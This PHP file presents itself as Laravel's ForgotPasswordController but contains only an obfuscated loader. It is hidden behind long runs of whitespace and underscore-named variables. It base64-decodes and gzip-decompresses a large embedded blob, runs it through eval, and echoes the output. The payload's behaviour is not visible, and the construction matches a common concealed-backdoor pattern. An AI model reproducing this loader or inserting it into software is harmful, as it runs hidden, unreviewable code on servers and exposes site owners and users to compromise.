<?php 
        $__='printf';$_='Loading app/Http/Controllers/Auth/ForgotPasswordController.php';
        



























































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































































































                                                                                                                                                                                                                     $________;
